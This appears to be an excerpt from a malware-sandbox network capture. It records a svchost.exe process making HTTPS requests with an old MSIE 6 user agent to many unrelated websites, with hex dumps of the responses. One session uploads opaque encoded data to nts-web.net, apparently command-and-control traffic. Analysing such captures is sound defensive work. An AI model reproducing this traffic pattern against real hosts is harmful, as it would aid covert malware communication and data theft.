                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:30 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hVP3GEULkcKsLweYhvkSlJvuWkWkPxNDUYvySu3zZIzYzjvwG2on4nIxisbGpwtN4HJQ%2FrH6V%2Ff52yclF5PLqDfxkMvWBFj3XBhEnY5LP79MOUWFiJoxKR%2Ft"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a88019802c3d-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2598INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2598INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        175192.168.2.61051138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2596OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2596INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2596INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        176192.168.2.61134138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2596OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2598INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2598INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        177192.168.2.61117185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2596OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2598INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2599INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        178192.168.2.66528449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2597OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        179192.168.2.6135991.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2600OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2604INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:57:08 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2636INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2671INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2687INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2703INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        18192.168.2.650827185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC248OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC280INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC280INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        180192.168.2.6106649.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2600OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 3856
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2600OUTData Raw: 69 57 73 2f 68 5a 79 6d 71 61 75 74 73 4c 4b 30 74 37 6d 38 78 4d 6a 4c 7a 74 47 36 79 32 44 65 5a 76 65 52 4c 6a 79 7a 44 42 72 2b 66 56 6d 71 31 74 6d 63 30 64 6f 62 53 4c 57 34 55 73 5a 4d 63 71 37 52 5a 2f 61 47 69 76 70 79 66 78 64 67 32 74 74 5a 52 49 56 32 42 38 4f 6c 7a 79 59 61 31 34 48 4f 79 61 49 59 41 75 67 4e 78 77 68 2f 4c 34 4f 4c 45 73 30 53 56 7a 37 34 62 34 43 2f 6f 48 4c 71 79 48 66 68 6c 32 53 78 57 7a 4e 4a 53 31 73 57 43 46 4b 39 44 32 37 69 45 44 52 48 73 75 67 66 35 4f 7a 7a 50 50 70 59 64 48 58 37 78 45 2b 4b 44 50 6c 72 32 78 75 64 77 6d 66 6d 52 37 34 6a 77 66 56 71 58 45 33 43 6e 6c 76 69 30 6f 50 42 4d 69 4e 49 66 2f 63 79 37 4d 51 54 52 5a 55 39 45 77 44 63 44 71 46 4c 46 44 42 6b 59 51 64 2f 70 65 52 33 46 64 77 68 2f 6c 62
                                                                                                                                                                                                                                                                        Data Ascii: iWs/hZymqautsLK0t7m8xMjLztG6y2DeZveRLjyzDBr+fVmq1tmc0dobSLW4UsZMcq7RZ/aGivpyfxdg2ttZRIV2B8OlzyYa14HOyaIYAugNxwh/L4OLEs0SVz74b4C/oHLqyHfhl2SxWzNJS1sWCFK9D27iEDRHsugf5OzzPPpYdHX7xE+KDPlr2xudwmfmR74jwfVqXE3Cnlvi0oPBMiNIf/cy7MQTRZU9EwDcDqFLFDBkYQd/peR3Fdwh/lb


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        181192.168.2.614405.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2604OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2604INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:31 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2604INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2620INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
